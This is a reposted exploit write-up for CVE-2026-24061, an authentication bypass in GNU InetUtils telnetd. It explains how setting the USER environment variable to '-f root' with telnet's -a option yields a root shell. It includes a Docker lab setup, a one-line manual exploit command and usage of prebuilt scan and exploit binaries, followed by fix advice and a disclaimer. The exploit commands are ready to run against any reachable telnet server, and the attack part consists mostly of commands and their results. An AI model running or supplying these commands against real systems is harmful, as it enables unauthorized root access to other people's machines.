Share
## https://sploitus.com/exploit?id=D401FBA8-95BE-5A77-A78A-D7A146C8B83D
# CVE-2026-24061: telnetd Authentication Bypass Vulnerability

CVE-2026-24061 is an authentication bypass vulnerability in telnetd that allows attackers to bypass identity verification through specific combinations of environment variables and directly obtain a root-privileged shell.

There is a flaw in telnetd's authentication logic. When using the `-a` option (automatic login) combined with a specific `USER` environment variable (such as `-f root`), it is possible to bypass the normal authentication process and log in directly as the root user.

## Introduction

GNU InetUtils is a collection of basic network tools under the GNU project. It contains many traditional network clients and daemons, such as `ftp`, `telnet`, `rsh`, `rlogin`, `tftp`, etc., providing a comprehensive and GNU-style network component library. `telnetd` is the server program in this toolkit responsible for handling incoming Telnet connection requests, with the primary task of providing remote users with an interactive terminal interface (usually a Shell).

### How It Works

1. Usually monitored by `inetd` or `xinetd` on port 23. When a request arrives, `telnetd` is started.
2. Handles Telnet protocol-specific option negotiation (such as terminal type, window size, character set, etc.).
3. Usually calls the system's underlying `login` program to verify the username and password.
4. After successful login, it allocates a pseudo-terminal to the user and starts the specified Shell.

### References

- https://github.com/yanxinwu946/CVE-2026-24061--telnetd
- https://github.com/vulhub/vulhub/
- https://forum.butian.net/share/4766

## Environment Setup

First, download this repository locally. The directory structure is as follows:
![](imgs/a375baa7b4dce67f10a50d65389cb2a6.png)

In this directory, execute the following command to start the vulnerable environment for CVE-2026-24061:

```
docker compose up -d --build
```

![](imgs/2a79d2c4ca397da3752986f450b8ad7b.png)

After startup, the telnet service will run on `0.0.0.0:2323`
![](imgs/16c5004ab59ad98bda29b418b0f9ebd3.png)

## Vulnerability Principle

1. The `-a` option of telnetd is used to enable automatic login functionality
2. When `-a` is enabled, telnetd reads the `USER` environment variable as the login username
3. If the `USER` environment variable is set to `-f root`, telnetd incorrectly interprets `-f` as an option flag and `root` as the target user
4. This causes the authentication check to be bypassed, establishing a session directly as the root user

## Vulnerability Exploitation

### Manual Exploitation

```
# Set the USER environment variable and connect with telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323
```

Upon success, you will obtain an interactive shell with root privileges:
![](imgs/00979ae3a35f116644a1d609b55efdc9.png)

### Tool-Based Exploitation

```
cd exp
```

![](imgs/bd8c1ac05b32f1bf23eb7441e849b55a.png)

You can see three files: `exp`, `exp_darwin`, and `exp.exe` are executable files for Linux, Mac, and Windows respectively. Choose the one you need. Tool source code is also provided. If you need other versions, you can compile them yourself. Here I'm using `exp` for Linux, which has detailed help information.
![](imgs/6c8d63c37999f30ca9702527652c230b.png)

**Detect if the vulnerability exists (default scans port 23):**

```
./exp -mode scan -target your-ip -port your-port
```

![](imgs/aac38f689804f1166ea4799fe678e48a.png)

**Exploit the vulnerability and obtain a shell:**

```
./exp -mode exploit -target your-ip -port your-port
```

![](imgs/9d64a4ed440a60f328d99f755e52ec5b.png)

## How to Fix

1. Upgrade inetutils-telnetd to the latest version
2. Disable the telnet service in the production environment and use SSH instead
3. Deploy the telnet service in an isolated internal network environment
4. Use a firewall to restrict the access source of the telnet service

## Disclaimer

This project is for security research and educational purposes only. Do not use it on unauthorized systems. Users assume all legal responsibility for any consequences resulting from the use of this tool.